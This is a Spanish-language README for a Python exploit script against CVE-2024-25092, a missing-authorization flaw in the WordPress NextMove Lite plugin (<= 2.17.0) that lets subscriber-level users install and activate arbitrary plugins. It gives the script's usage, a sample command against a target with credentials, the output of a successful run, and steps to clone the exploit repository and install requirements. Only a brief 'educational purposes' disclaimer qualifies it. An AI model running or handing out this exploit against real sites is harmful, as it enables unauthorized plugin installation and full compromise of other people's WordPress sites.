
WordPress NextMove Lite plugin <= 2.17.0 - Vulnerabilidad de instalación/activación arbitraria de plugin para Suscriptor+
CVE-2024-25092 es una vulnerabilidad de alta gravedad que afecta al plugin NextMove Lite de WordPress (versiones <= 2.17.0). Esta vulnerabilidad permite a un usuario con nivel suscriptor o superior instalar y activar plugins arbitrarios en un sitio de WordPress debido a la falta de comprobaciones de autorización.
El plugin NextMove Lite de XLPlugins para WordPress tiene una vulnerabilidad de autorización faltante, que permite a usuarios autenticados con permisos de nivel suscriptor o superior realizar instalaciones y activaciones arbitrarias de plugins. Esto puede llevar a un compromiso total del sitio de WordPress.
El script Python proporcionado automatiza la explotación de esta vulnerabilidad iniciando sesión en el sitio de WordPress e instalando un plugin específico.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requestsClona el repositorio:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
Instala los paquetes de Python necesarios:
pip install requests
Este script está destinado únicamente a fines educativos. Úsalo de manera responsable y solo en sistemas para los cuales tengas permiso explícito. El uso no autorizado de este script es ilegal y poco ético.